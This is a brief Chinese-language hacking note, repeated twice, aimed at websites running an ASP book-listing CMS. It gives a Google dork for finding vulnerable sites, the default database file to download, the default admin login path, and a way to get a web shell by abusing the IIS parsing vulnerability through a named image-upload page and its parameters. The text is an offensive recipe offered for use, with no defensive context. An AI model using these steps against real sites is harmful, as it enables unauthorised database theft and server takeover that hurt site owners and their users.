谷歌搜索:inurl:pro_list.asp?bookid=
关键字 inurl:..?bookid=196
默认数据库下载:db\hualiang#.mdb
默认后台: /manage/login.asp
拿shell方法:iis解析漏洞:
漏洞页面:Up_BookPic.asp?formname=myform&editname=samll_pic&uppath=bookpic&filelx=jpg
谷歌搜索:inurl:pro_list.asp?bookid=
关键字 inurl:..?bookid=196
默认后台: /manage/login.asp
拿shell方法:iis解析漏洞:
漏洞页面:Up_BookPic.asp?formname=myform&editname=samll_pic&uppath=bookpic&filelx=jpg